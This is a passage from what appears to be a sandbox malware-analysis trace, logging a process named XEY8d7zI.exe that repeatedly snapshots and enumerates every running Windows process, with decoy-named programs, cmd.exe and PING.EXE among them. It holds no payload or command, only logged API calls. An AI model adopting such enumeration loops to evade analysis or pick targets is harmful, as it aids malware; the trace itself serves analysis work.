th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0103.396] CloseHandle (hObject=0xc4) returned 1 [0103.396] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0103.402] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, 
dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.403] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.404] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.405] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.405] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="services.exe")) returned 1 [0103.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.410] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.469] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0103.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.472] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.474] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.475] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.477] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="taskeng.exe")) returned 1 [0103.478] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.480] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.481] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.483] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.484] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.486] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.487] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.489] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.490] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.492] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.493] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.495] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.496] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.497] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.498] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.499] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.500] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.501] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.502] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.552] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.553] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0103.554] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0103.555] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0103.556] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0103.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0103.558] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0103.559] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0103.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbe8, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0103.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0103.562] CloseHandle (hObject=0xbc) returned 1 [0103.562] Sleep (dwMilliseconds=0x12c) [0103.905] CreateToolhelp32Snapshot (dwFlags=0xf, 
th32ProcessID=0x0) returned 0xc4 [0103.910] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.912] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, 
szExeFile="winlogon.exe")) returned 1 [0103.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.916] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0103.919] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.921] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.922] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.925] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="taskhost.exe")) returned 1 [0103.926] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.928] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.929] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.930] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.931] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 